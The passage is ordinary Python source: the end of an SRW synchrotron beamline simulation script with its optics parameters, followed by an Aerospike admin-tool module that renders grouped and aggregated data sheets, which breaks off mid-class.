intensity distribution: 0- Linear Horizontal, 1- Linear Vertical, 2- Linear 45 degrees, 3- Linear 135 degrees, 4- Circular Right, 5- Circular Left, 6- Total'], ['si_type', 'i', 0, 'type of a characteristic to be extracted after calculation of intensity distribution: 0- Single-Electron Intensity, 1- Multi-Electron Intensity, 2- Single-Electron Flux, 3- Multi-Electron Flux, 4- Single-Electron Radiation Phase, 5- Re(E): Real part of Single-Electron Electric Field, 6- Im(E): Imaginary part of Single-Electron Electric Field, 7- Single-Electron Intensity, integrated over Time or Photon Energy'], ['w_mag', 'i', 2, 'magnetic field to be used for calculation of intensity distribution vs horizontal and vertical position: 1- approximate, 2- accurate'], ['si_fn', 's', 'res_int_se.dat', 'file name for saving calculated single-e intensity distribution (without wavefront propagation through a beamline) vs horizontal and vertical position'], ['si_pl', 's', '', 'plot the input intensity distributions in graph(s): ""- dont plot, "x"- vs horizontal position, "y"- vs vertical position, "xy"- vs horizontal and vertical position'], ['ws_fni', 's', 'res_int_pr_se.dat', 'file name for saving propagated single-e intensity distribution vs horizontal and vertical position'], ['ws_pl', 's', '', 'plot the resulting intensity distributions in graph(s): ""- dont plot, "x"- vs horizontal position, "y"- vs vertical position, "xy"- vs horizontal and vertical position'], ['wm_nm', 'i', 1000, 'number of macro-electrons (coherent wavefronts) for calculation of multi-electron wavefront propagation'], ['wm_na', 'i', 5, 'number of macro-electrons (coherent wavefronts) to average on each node for parallel (MPI-based) calculation of multi-electron wavefront propagation'], ['wm_ns', 'i', 5, 'saving periodicity (in terms of macro-electrons / coherent wavefronts) for intermediate intensity at multi-electron wavefront propagation calculation'], ['wm_ch', 'i', 0, 'type of a characteristic to be extracted after calculation of multi-electron wavefront propagation: #0- intensity (s0); 1- four Stokes components; 2- mutual intensity cut vs x; 3- mutual intensity cut vs y; 40- intensity(s0), mutual intensity cuts and degree of coherence vs X & Y'], ['wm_ap', 'i', 0, 'switch specifying representation of the resulting Stokes parameters: coordinate (0) or angular (1)'], ['wm_x0', 'f', 0, 'horizontal center position for mutual intensity cut calculation'], ['wm_y0', 'f', 0, 'vertical center position for mutual intensity cut calculation'], ['wm_ei', 'i', 0, 'integration over photon energy is required (1) or not (0); if the integration is required, the limits are taken from w_e, w_ef'], ['wm_rm', 'i', 1, 'method for generation of pseudo-random numbers for e-beam phase-space integration: 1- standard pseudo-random number generator, 2- Halton sequences, 3- LPtau sequences (to be implemented)'], ['wm_am', 'i', 0, 'multi-electron integration approximation method: 0- no approximation (use the standard 5D integration method), 1- integrate numerically only over e-beam energy spread and use convolution to treat transverse emittance'], ['wm_fni', 's', 'res_int_pr_me.dat', 'file name for saving propagated multi-e intensity distribution vs horizontal and vertical position'], #to add options ['op_r', 'f', 20.0, 'longitudinal position of the first optical element [m]'], # Former appParam: ['rs_type', 's', 't', 'source type, (u) idealized undulator, (t), tabulated undulator, (m) multipole, (g) gaussian beam'], #---Beamline optics: # S0: aperture ['op_S0_shape', 's', 'r', 'shape'], ['op_S0_Dx', 'f', 0.002, 'horizontalSize'], ['op_S0_Dy', 'f', 0.001, 'verticalSize'], ['op_S0_x', 'f', 0.0, 'horizontalOffset'], ['op_S0_y', 'f', 0.0, 'verticalOffset'], # S0_HFM: drift ['op_S0_HFM_L', 'f', 1.081, 'length'], # HFM: sphericalMirror ['op_HFM_hfn', 's', 'None', 'heightProfileFile'], ['op_HFM_dim', 's', 'x', 'orientation'], ['op_HFM_r', 'f', 8871.45, 'radius'], ['op_HFM_size_tang', 'f', 0.95, 'tangentialSize'], ['op_HFM_size_sag', 'f', 0.005, 'sagittalSize'], ['op_HFM_ang', 'f', 0.0025, 'grazingAngle'], ['op_HFM_nvx', 'f', 0.999996875002, 'normalVectorX'], ['op_HFM_nvy', 'f', 0.0, 'normalVectorY'], ['op_HFM_nvz', 'f', -0.00249999739583, 'normalVectorZ'], ['op_HFM_tvx', 'f', 0.00249999739583, 'tangentialVectorX'], ['op_HFM_tvy', 'f', 0.0, 'tangentialVectorY'], ['op_HFM_amp_coef', 'f', 1.0, 'heightAmplification'], ['op_HFM_x', 'f', 0.0, 'horizontalOffset'], ['op_HFM_y', 'f', 0.0, 'verticalOffset'], # HFM_S1: drift ['op_HFM_S1_L', 'f', 1.407, 'length'], # S1: aperture ['op_S1_shape', 's', 'r', 'shape'], ['op_S1_Dx', 'f', 0.0024, 'horizontalSize'], ['op_S1_Dy', 'f', 0.0015, 'verticalSize'], ['op_S1_x', 'f', 0.0, 'horizontalOffset'], ['op_S1_y', 'f', 0.0, 'verticalOffset'], # S1_DCM_C1: drift ['op_S1_DCM_C1_L', 'f', 0.781, 'length'], # DCM_C1: crystal ['op_DCM_C1_hfn', 's', '', 'heightProfileFile'], ['op_DCM_C1_dim', 's', 'x', 'orientation'], ['op_DCM_C1_d_sp', 'f', 3.13557135638, 'dSpacing'], ['op_DCM_C1_psi0r', 'f', -1.53227839905e-05, 'psi0r'], ['op_DCM_C1_psi0i', 'f', 3.59410775406e-07, 'psi0i'], ['op_DCM_C1_psiHr', 'f', -8.10706354484e-06, 'psiHr'], ['op_DCM_C1_psiHi', 'f', 2.50931132347e-07, 'psiHi'], ['op_DCM_C1_psiHBr', 'f', -8.10706354484e-06, 'psiHBr'], ['op_DCM_C1_psiHBi', 'f', 2.50931132347e-07, 'psiHBi'], ['op_DCM_C1_tc', 'f', 0.01, 'crystalThickness'], ['op_DCM_C1_ang_as', 'f', 0.0, 'asymmetryAngle'], ['op_DCM_C1_nvx', 'f', -0.968973817886, 'nvx'], ['op_DCM_C1_nvy', 'f', 2.59635532439e-08, 'nvy'], ['op_DCM_C1_nvz', 'f', -0.247163387763, 'nvz'], ['op_DCM_C1_tvx', 'f', -0.247163387763, 'tvx'], ['op_DCM_C1_tvy', 'f', 6.62271741473e-09, 'tvy'], ['op_DCM_C1_ang', 'f', 0.249751717635, 'grazingAngle'], ['op_DCM_C1_amp_coef', 'f', 1.0, 'heightAmplification'], # DCM_C2: crystal ['op_DCM_C2_hfn', 's', '', 'heightProfileFile'], ['op_DCM_C2_dim', 's', 'x', 'orientation'], ['op_DCM_C2_d_sp', 'f', 3.13557135638, 'dSpacing'], ['op_DCM_C2_psi0r', 'f', -1.53227839905e-05, 'psi0r'], ['op_DCM_C2_psi0i', 'f', 3.59410775406e-07, 'psi0i'], ['op_DCM_C2_psiHr', 'f', -8.10706354484e-06, 'psiHr'], ['op_DCM_C2_psiHi', 'f', 2.50931132347e-07, 'psiHi'], ['op_DCM_C2_psiHBr', 'f', -8.10706354484e-06, 'psiHBr'], ['op_DCM_C2_psiHBi', 'f', 2.50931132347e-07, 'psiHBi'], ['op_DCM_C2_tc', 'f', 0.01, 'crystalThickness'], ['op_DCM_C2_ang_as', 'f', 0.0, 'asymmetryAngle'], ['op_DCM_C2_nvx', 'f', 0.968973817886, 'nvx'], ['op_DCM_C2_nvy', 'f', 0.0, 'nvy'], ['op_DCM_C2_nvz', 'f', -0.247163387763, 'nvz'], ['op_DCM_C2_tvx', 'f', 0.247163387763, 'tvx'], ['op_DCM_C2_tvy', 'f', 0.0, 'tvy'], ['op_DCM_C2_ang', 'f', 0.249751717635, 'grazingAngle'], ['op_DCM_C2_amp_coef', 'f', 1.0, 'heightAmplification'], # DCM_C2_At_BPM1: drift ['op_DCM_C2_At_BPM1_L', 'f', 2.2416, 'length'], # At_BPM1_Before_SSA: drift ['op_At_BPM1_Before_SSA_L', 'f', 11.9668, 'length'], # SSA: aperture ['op_SSA_shape', 's', 'r', 'shape'], ['op_SSA_Dx', 'f', 5e-05, 'horizontalSize'], ['op_SSA_Dy', 'f', 0.003, 'verticalSize'], ['op_SSA_x', 'f', 0.0, 'horizontalOffset'], ['op_SSA_y', 'f', 0.0, 'verticalOffset'], # SSA_AKB: drift ['op_SSA_AKB_L', 'f', 11.8308, 'length'], # AKB: aperture ['op_AKB_shape', 's', 'r', 'shape'], ['op_AKB_Dx', 'f', 0.003, 'horizontalSize'], ['op_AKB_Dy', 'f', 0.000875, 'verticalSize'], ['op_AKB_x', 'f', 0.0, 'horizontalOffset'], ['op_AKB_y', 'f', 0.0, 'verticalOffset'], # AKB_KBV: drift ['op_AKB_KBV_L', 'f', 0.175, 'length'], # KBV: ellipsoidMirror ['op_KBV_hfn', 's', '', 'heightProfileFile'], ['op_KBV_dim', 's', 'x', 'orientation'], ['op_KBV_p', 'f', 63.913, 'firstFocusLength'], ['op_KBV_q', 'f', 0.637, 'focalLength'], ['op_KBV_ang', 'f', 0.0025, 'grazingAngle'], ['op_KBV_amp_coef', 'f', 1.0, 'heightAmplification'], ['op_KBV_size_tang', 'f', 0.35, 'tangentialSize'], ['op_KBV_size_sag', 'f', 0.003, 'sagittalSize'], ['op_KBV_nvx', 'f', 0.0, 'normalVectorX'], ['op_KBV_nvy', 'f', 0.999996875002, 'normalVectorY'], ['op_KBV_nvz', 'f', -0.00249999739583, 'normalVectorZ'], ['op_KBV_tvx', 'f', 0.0, 'tangentialVectorX'], ['op_KBV_tvy', 'f', -0.00249999739583, 'tangentialVectorY'], ['op_KBV_x', 'f', 0.0, 'horizontalOffset'], ['op_KBV_y', 'f', 0.0, 'verticalOffset'], # KBV_KBH: drift ['op_KBV_KBH_L', 'f', 0.337, 'length'], # KBH: ellipsoidMirror ['op_KBH_hfn', 's', '', 'heightProfileFile'], ['op_KBH_dim', 's', 'x', 'orientation'], ['op_KBH_p', 'f', 12.3428, 'firstFocusLength'], ['op_KBH_q', 'f', 0.3, 'focalLength'], ['op_KBH_ang', 'f', 0.0025, 'grazingAngle'], ['op_KBH_amp_coef', 'f', 1.0, 'heightAmplification'], ['op_KBH_size_tang', 'f', 0.3, 'tangentialSize'], ['op_KBH_size_sag', 'f', 0.003, 'sagittalSize'], ['op_KBH_nvx', 'f', 0.999996875002, 'normalVectorX'], ['op_KBH_nvy', 'f', 0.0, 'normalVectorY'], ['op_KBH_nvz', 'f', -0.00249999739583, 'normalVectorZ'], ['op_KBH_tvx', 'f', -0.00249999739583, 'tangentialVectorX'], ['op_KBH_tvy', 'f', 0.0, 'tangentialVectorY'], ['op_KBH_x', 'f', 0.0, 'horizontalOffset'], ['op_KBH_y', 'f', 0.0, 'verticalOffset'], # KBH_At_Sample: drift ['op_KBH_At_Sample_L', 'f', 0.3, 'length'], #---Propagation parameters ['op_S0_pp', 'f', [0, 0, 1.0, 0, 0, 1.1, 7.0, 1.3, 10.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], 'S0'], ['op_S0_HFM_pp', 'f', [0, 0, 1.0, 1, 0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], 'S0_HFM'], ['op_HFM_pp', 'f', [0, 0, 1.0, 0, 0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], 'HFM'], ['op_HFM_S1_pp', 'f', [0, 0, 1.0, 1, 0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], 'HFM_S1'], ['op_S1_pp', 'f', [0, 0, 1.0, 0, 0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], 'S1'], ['op_S1_DCM_C1_pp', 'f', [0, 0, 1.0, 1, 0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], 'S1_DCM_C1'], ['op_DCM_C1_pp', 'f', [0, 0, 1.0, 0, 0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], 'DCM_C1'], ['op_DCM_C2_pp', 'f', [0, 0, 1.0, 0, 0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], 'DCM_C2'], ['op_DCM_C2_At_BPM1_pp', 'f', [0, 0, 1.0, 1, 0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], 'DCM_C2_At_BPM1'], ['op_At_BPM1_Before_SSA_pp', 'f', [0, 0, 1.0, 1, 0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], 'At_BPM1_Before_SSA'], ['op_SSA_pp', 'f', [0, 0, 1.0, 0, 0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], 'SSA'], ['op_SSA_AKB_pp', 'f', [0, 0, 1.0, 1, 0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], 'SSA_AKB'], ['op_AKB_pp', 'f', [0, 0, 1.0, 0, 0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], 'AKB'], ['op_AKB_KBV_pp', 'f', [0, 0, 1.0, 1, 0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], 'AKB_KBV'], ['op_KBV_pp', 'f', [0, 0, 1.0, 0, 0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], 'KBV'], ['op_KBV_KBH_pp', 'f', [0, 0, 1.0, 1, 0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], 'KBV_KBH'], ['op_KBH_pp', 'f', [0, 0, 1.0, 0, 0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], 'KBH'], ['op_KBH_At_Sample_pp', 'f', [0, 0, 1.0, 4, 0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], 'KBH_At_Sample'], ['op_fin_pp', 'f', [0, 0, 1.0, 0, 1, 0.5, 1.0, 0.2, 2.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], 'final post-propagation (resize) parameters'], #[ 0]: Auto-Resize (1) or not (0) Before propagation #[ 1]: Auto-Resize (1) or not (0) After propagation #[ 2]: Relative Precision for propagation with Auto-Resizing (1. is nominal) #[ 3]: Allow (1) or not (0) for semi-analytical treatment of the quadratic (leading) phase terms at the propagation #[ 4]: Do any Resizing on Fourier side, using FFT, (1) or not (0) #[ 5]: Horizontal Range modification factor at Resizing (1. means no modification) #[ 6]: Horizontal Resolution modification factor at Resizing #[ 7]: Vertical Range modification factor at Resizing #[ 8]: Vertical Resolution modification factor at Resizing #[ 9]: Type of wavefront Shift before Resizing (not yet implemented) #[10]: New Horizontal wavefront Center position after Shift (not yet implemented) #[11]: New Vertical wavefront Center position after Shift (not yet implemented) #[12]: Optional: Orientation of the Output Optical Axis vector in the Incident Beam Frame: Horizontal Coordinate #[13]: Optional: Orientation of the Output Optical Axis vector in the Incident Beam Frame: Vertical Coordinate #[14]: Optional: Orientation of the Output Optical Axis vector in the Incident Beam Frame: Longitudinal Coordinate #[15]: Optional: Orientation of the Horizontal Base vector of the Output Frame in the Incident Beam Frame: Horizontal Coordinate #[16]: Optional: Orientation of the Horizontal Base vector of the Output Frame in the Incident Beam Frame: Vertical Coordinate ]) def setup_magnetic_measurement_files(filename, v): import os import re import zipfile z = zipfile.ZipFile(filename) z.extractall() for f in z.namelist(): if re.search(r'\.txt', f): v.und_mfs = os.path.basename(f) v.und_mdir = os.path.dirname(f) or './' return raise RuntimeError('missing magnetic measurement index *.txt file') def main(): v = srwl_bl.srwl_uti_parse_options(varParam, use_sys_argv=True) setup_magnetic_measurement_files("magn_meas_srx.zip", v) op = set_optics(v) v.ss = True v.ss_pl = 'e' v.sm = True v.sm_pl = 'e' v.pw = True v.pw_pl = 'xy' v.si = True v.si_pl = 'xy' v.tr = True v.tr_pl = 'xz' v.ws = True v.ws_pl = 'xy' mag = None if v.rs_type == 'm': mag = srwlib.SRWLMagFldC() mag.arXc.append(0) mag.arYc.append(0) mag.arMagFld.append(srwlib.SRWLMagFldM(v.mp_field, v.mp_order, v.mp_distribution, v.mp_len)) mag.arZc.append(v.mp_zc) srwl_bl.SRWLBeamline(_name=v.name, _mag_approx=mag).calc_all(v, op) main()
# Copyright 2019 Aerospike, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from collections import OrderedDict from itertools import groupby from operator import itemgetter from lib.utils import util from lib.view.terminal import get_terminal_size, terminal from .. import decleration from ..const import DynamicFieldOrder from ..source import source_lookup from .render_utils import ErrorEntry, NoEntry class BaseRSheet(object): def __init__( self, sheet, title, sources, common, description=None, selectors=None, title_repeat=False, disable_aggregations=False, dynamic_diff=False, ): """ Arguments: sheet -- The decleration.sheet to render. title -- Title for this render. data_source -- Dictionary of data-sources to project fields from. Keyword Arguments: sheet_style -- 'SheetStyle.columns': Output fields as columns. 'SheetStyle.rows' : Output fields as rows. 'SheetStyle.json' : Output sheet as JSON. common -- A dict of common information passed to each entry. description -- A description of the sheet. selectors -- List of regular expressions to select which fields from dynamic fields. title_repeat -- Repeat title/row headers every screen width. Doesn't affect SheetStyle.json. disable_aggregations -- Disable sheet aggregations. dynamic_diff -- Only show dynamic fields that aren't uniform. """ self.decleration = sheet self.title = title self._debug_sources = sources self._init_sources(sources) self.common = common self.description = description self.selector = util.compile_likes(selectors) self.title_repeat = title_repeat self.disable_aggregations = disable_aggregations self.dynamic_diff = dynamic_diff self.terminal_size = get_terminal_size() self.dfields = self.get_dfields() if not self.dfields: self.rfields = None # nothing to display return projections = self.project_fields() projections = self.where(projections) if self.has_all_required_fields(projections): projections_groups = self.group_by_fields(projections) self.group_hidden_fields = [[]] * len(projections_groups) projections_groups = self.diff(projections_groups) projections_groups = self.order_by_fields(projections_groups) self.rfields = self.create_rfields(projections_groups) self.visible_rfields = [ rfield for rfield in self.rfields if not rfield.hidden ] for rfield in self.rfields: rfield.prepare() else: self.rfields = None # nothing to display # ========================================================================= # Required overrides. def do_render(self): """ Renders the data in the style defined by the RSheet class. """ raise NotImplementedError("override") def do_create_tuple_field(self, field, groups): """ Each RSheet may define custom versions of RSubgroup. Arguments: field -- The decleration.Subgroup describing this tuple field. groups -- The data sources having already been processed into groups. """ raise NotImplementedError("override") def do_create_field(self, field, groups, parent_key=None): """ Each RSheet may define custom version of RFields. Arguments: field -- The decleration.Field describing this field. groups -- The data sources having already been processed into groups. Keyword Arguments: parent_key -- If this field is the child of a Subgroup, then this is the key defined within that Subgroup. """ raise NotImplementedError("override") # ========================================================================= # Other methods. def _init_sources(self, sources): # TODO - This assertion can fire when a node is leaving/joining and # some commands on a subset of the nodes. Should this event be # logged? # n_source_records = map(len, list(sources.values())) # assert len(set(n_source_records)) == 1, \ # "sources contain different numbers of records {}".format( # zip(sources.keys(), n_source_records)) # Change sources from: {'source':{'row_key':value}} # to: [{'source':value}] # If source is a list convert it to a dictionary for key in sources.keys(): if isinstance(sources[key], list): sources[key] = dict(enumerate(sources[key])) source_keys = {} # Using a dict as a set to maintain order and exclusivity for data in sources.values(): if isinstance(data, dict): for keys in data.keys(): source_keys[keys] = None converted_sources = [] for row_key in source_keys: new_source = {} for source, value in sources.items(): new_source[source] = value.get(row_key) else: converted_sources.append(new_source) # Expand for_each expanded_sources = [] for source in converted_sources: if not self.decleration.for_each: expanded_sources.append(source) continue for for_each in self.decleration.for_each: sub_source = source[for_each] try: for item in sub_source.items(): new_source = source.copy() new_source[for_each] = item expanded_sources.append(new_source) except AttributeError: # Non-iterable - probably an Exception. new_source = source.copy() new_source[for_each] = ErrorEntry expanded_sources.append(new_source) self.sources = expanded_sources self.n_records = len(expanded_sources) def render(self): # XXX - Could be useful to pass 'group_by' and 'order_by' into the # render function. Could use the decl's copy as their defaults. if self.rfields is None: return None return self.do_render() def get_dfields(self): dfields = [] ignore_keys = set() for dfield in self.decleration.fields: if isinstance(dfield, decleration.DynamicFields): keys = {} for sources in self.sources: try: if dfield.source in self.decleration.for_each and isinstance( sources[dfield.source], tuple ): keys.update( ( (k, None) for k in source_lookup(sources, dfield.source)[ 1 ].keys() ) ) else: keys.update( ( (k, None) for k in source_lookup( sources, dfield.source ).keys() ) ) except (AttributeError, TypeError): pass if self.selector is not None: keys = [ key for key in keys if self.selector.search(key) is not None ] if dfield.order is DynamicFieldOrder.ascending: keys.sort() elif dfield.order is DynamicFieldOrder.descending: keys.sort(reverse=True) for key in keys: if key in ignore_keys: continue if dfield.converter_selector: conv_func = dfield.converter_selector(key) else: conv_func = None if dfield.projector_selector: proj_func = dfield.projector_selector(key) proj = proj_func(dfield.source, key) else: proj = self._infer_projector(dfield, key) if ( not self.disable_aggregations and dfield.aggregator_selector is not None ): aggr = dfield.aggregator_selector( key, self._is_projector_numeric(proj) ) else: aggr = None dfields.append( decleration.Field( key, proj, aggregator=aggr, dynamic_field_decl=dfield, converter=conv_func ) ) else: dfields.append(dfield) # To keep data displayed in a Field from being displayed in a DynamicFields if ( isinstance(dfield, decleration.Field) and dfield.projector.keys is not None ): ignore_keys.update(dfield.projector.keys) return dfields def _is_projector_numeric(self, projector): return isinstance(projector, decleration.Projectors.Float) or isinstance( projector, decleration.Projectors.Number ) def _infer_projector(self, dfield, key): proj_args = (dfield.source, key) if not dfield.infer_projectors: return decleration.Projectors.String(*proj_args) entries = [] for sources in self.sources: try: if isinstance(sources[dfield.source], tuple): entries.append(source_lookup(sources, dfield.source)[1][key]) else: entries.append(source_lookup(sources, dfield.source)[key]) except (KeyError, TypeError): # Missing or error retrieving, ignore for inference. pass has_string = False has_float = False has_int = False for entry in entries: try: int(entry) has_int = True continue except (ValueError, TypeError): pass try: float(entry) has_float = True continue except (ValueError, TypeError): pass has_string = True if has_string: return decleration.Projectors.String(*proj_args) elif has_float: return decleration.Projectors.Float(*proj_args) elif has_int: return decleration.Projectors.Number(*proj_args) else: # no entries return decleration.Projectors.String(*proj_args) def project_fields(self): projections = [] for sources in self.sources: projection = OrderedDict() projections.append(projection) for dfield in self.dfields: self._project_field(dfield, sources, projection) return projections def _project_field(self, dfield, sources, projection): if isinstance(dfield, decleration.Subgroup): child_projections = OrderedDict() projection[dfield.key] = child_projections for child_dfield in dfield.fields: self._project_field(child_dfield, sources, child_projections) return try: entry = dfield.projector(self.decleration, sources) except decleration.NoEntryException: entry = NoEntry except decleration.ErrorEntryException: entry = ErrorEntry projection[dfield.key] = entry def where(self, projections): if self.decleration.where: where_fn = self.decleration.where for record_ix in range(len(projections) - 1, -1, -1): if not where_fn(projections[record_ix]): del projections[record_ix] return projections def has_all_required_fields(self, projections): required_dfields = set() for dfield in self.decleration.fields: if not isinstance(dfield, decleration.DynamicFields): continue if dfield.required: required_dfields.add(dfield) if not required_dfields: return True unfound_fields = required_dfields for dfield in self.dfields: if dfield.dynamic_field_decl in unfound_fields: unfound_fields.remove(dfield.dynamic_field_decl) if not unfound_fields: return True return False def diff(self, projection_groups): if not self.dynamic_diff: return projection_groups dynamic_dfields = [ dfield for dfield in self.dfields if isinstance(dfield.dynamic_field_decl, decleration.DynamicFields) or dfield.allow_diff ] drop_dfields_groups = [] for group_idx in range(len(projection_groups)): drop_dfields = [] for dfield in dynamic_dfields: entries = [ projection[dfield.key] for projection in list(projection_groups.values())[group_idx] if not projection[dfield.key] in (NoEntry, ErrorEntry) ] if all(entries[0] == entry for entry in entries): drop_dfields.append(dfield) drop_dfields_groups.append(drop_dfields) # dfields in intersection can be dropped from all projections. # If it is not in interestion but needs to be "dropped" (not displayed) # from a specific group we will use hidden_fields drop_intersection = set(drop_dfields_groups[0]) for drop_dfields in drop_dfields_groups: drop_intersection = drop_intersection.intersection(set(drop_dfields)) self.group_hidden_fields = [] for group_idx in range(len(projection_groups)): hidden_fields = [] for dfield in drop_dfields_groups[group_idx]: for projection in list(projection_groups.values())[group_idx]: if dfield.key in projection: # If a field is in drop_intersection is it being dropped # from all groups. if dfield in drop_intersection: if dfield in self.dfields: self.dfields.remove(dfield) del projection[dfield.key] # Some groups need to drop the value and others do not. # Using hidden_fields[group_idx] to indicate when a # group should not display the field. else: projection[dfield.key] = None hidden_fields.append(dfield) self.group_hidden_fields.append(hidden_fields) return projection_groups def group_by_fields(self, projections): """ Single or composite key grouping """ # XXX - Allow 'group by' on a field within a Subgroup. grouping = (((), projections),) group_bys = self.decleration.group_bys if group_bys is None: return OrderedDict(grouping) if isinstance(group_bys, str): group_bys = (group_bys,) for group_by in group_bys: next_grouping = [] for pkey, pgroup in grouping: pgroup_sort = sorted(pgroup, key=itemgetter(group_by)) cgroups = [ (pkey + (ckey,), list(cgroup)) for ckey, cgroup in groupby(pgroup_sort, key=itemgetter(group_by)) ] next_grouping.extend(cgroups) grouping = next_grouping return OrderedDict(grouping) def order_by_fields(self, projections_groups): # XXX - Allow 'order by' on a field within a Subgroup. # XXX - Allow desc order. order_bys = self.decleration.order_bys if order_bys is None: return projections_groups for projections_group in projections_groups.values(): for order_by in order_bys[::-1]: projections_group.sort(key=itemgetter(order_by)) return projections_groups def create_rfields(self, projections_groups): groups = projections_groups.values() return [self.create_rfield(field, groups) for field in self.dfields] def create_rfield(self, field, groups, parent_key=None): if isinstance(field, decleration.Subgroup): return self.do_create_tuple_field(field, groups) return self.do_create_field(field, groups, parent_key=parent_key) class BaseRSubgroup(object): def __init__(self, rsheet, field, groups): """ Arguments: rsheet -- BaseRSheet being rendered. field -- decleration.Subgroup. groups -- Sequence of sub-sequences where each sub-sequence is a group determined by 'rsheet.decleration.group_bys'. """ self.rsheet = rsheet self.decleration = field self.parent_key = None self.n_groups = len(groups) self._init_as_tuple_field(groups) # ========================================================================= # Optional overrides. def do_prepare(self): """ Post processing phase after all fields in the RSheet have been initialized. """ return # Override if as needed. # ========================================================================= # Other methods. def _init_as_tuple_field(self, groups): self.is_tuple_field = True self.subfields = [ self.rsheet.do_create_field( subdecl, groups, parent_key=self.decleration.key ) for subdecl in self.decleration.fields ] self.visible = [subfield for subfield in self.subfields if not subfield.hidden] self.hidden = not self.visible def prepare(self): if self.hidden: return for subfield in self.subfields: subfield.prepare() self.do_prepare() def has_aggregate(self): return any(sub.has_aggregate() for sub in self.visible) def get_kv(self, group_ix, entry_ix): return ( self.decleration.key, dict(sub.get_kv(group_ix, entry_ix) for sub in self.visible), ) def n_entries_in_group(self, group_ix): return self.subfields[0].n_entries_in_group(group_ix) class BaseRField(object): def __init__(self, rsheet, field, groups, parent_key=None): """ Arguments: rsheet -- BaseRSheet being rendered. field -- 'decleration.Subgroup'. groups -- Sequence of sub-sequences where each sub-sequence is a group determined by 'rsheet.decleration.group_bys'. Keyword Argument: parent_key -- Not None: the decleration.key value for the parent 'Subgroup'. """ self.rsheet = rsheet self.decleration = field self.parent_key = parent_key self.n_groups = len(groups) if self.rsheet.decleration.group_bys: self.is_grouped_by = ( self.decleration.key in self.rsheet.decleration.group_bys ) else: self.is_grouped_by = False if self.rsheet.decleration.order_bys: self.is_ordered_by = ( self.decleration.key in self.rsheet.decleration.order_bys ) else: self.is_ordered_by = False self._init_as_field(groups) # ========================================================================= # Optional overrides. def do_prepare(self): """ Post processing phase after all fields in the RSheet have been initialized. """ return # Override as needed. # ========================================================================= # Other methods. def _init_as_field(self, raw_groups): self.is_tuple_field = False self.groups = [] self.groups_converted = [] self.aggregates = [] self.aggregates_converted = [] self._init_load_groups(raw_groups) def _init_load_groups(self, raw_groups): field_key = self.decleration.key if self.parent_key: self.groups = [ list(map(lambda g: g[self.parent_key][field_key], raw_group)) for raw_group in raw_groups ] else: self.groups = [ list(map(itemgetter(field_key), raw_group)) for raw_group in raw_groups ] # Determine if hidden. if self.decleration.hidden is None: self.hidden = not any( v is not NoEntry for group in self.groups for v in group ) else: self.hidden = self.decleration.hidden def prepare(self): if self.hidden: return self._prepare_entry_data() for entry_group in self.groups_entry_data: self._prepare_aggregate_group(entry_group) self._prepare_convert() self.do_prepare() def _prepare_entry_data(self): self.groups_entry_data = [] for group_ix, group in enumerate(self.groups): entry_edata = [] self.groups_entry_data.append(entry_edata) entries = [self.entry_value(e) for e in group] for entry_ix, entry in enumerate(entries): record = dict( ( rfield.get_kv(group_ix, entry_ix) for rfield in self.rsheet.rfields ) ) entry_edata.append( decleration.EntryData( value=entry, values=entries, record=record, common=self.rsheet.common, is_error=group[entry_ix] is ErrorEntry, is_no_entry=group[entry_ix] is NoEntry, ) ) def _prepare_aggregate_group(self, group): if self.hidden: # Do not need to aggregate hidden fields. self.aggregates.append(None) self.aggregates_converted.append("") return if self.rsheet.disable_aggregations or self.decleration.aggregator is None: if self.is_grouped_by and self.rsheet.decleration.has_aggregates: # If a grouped field doesn't have an aggregator then the grouped # value will appear in the aggregates line. entry = group[0].value self.aggregates.append(entry) if group[0].is_error: self.aggregates_converted.append( self.rsheet.decleration.error_entry ) elif group[0].is_no_entry: self.aggregates_converted.append(self.rsheet.decleration.no_entry) else: self.aggregates_converted.append(str(entry)) else: self.aggregates.append(None) self.aggregates_converted.append("") return if any(e.is_error for e in group): aggregate_value = ErrorEntry else: group_entries = [e for e in group if not e.is_no_entry] aggregate_value = self.decleration.aggregator.compute(group_entries) if aggregate_value is None: aggregate_value = NoEntry self.aggregates.append(aggregate_value) def _prepare_convert(self): self._prepare_convert_groups() 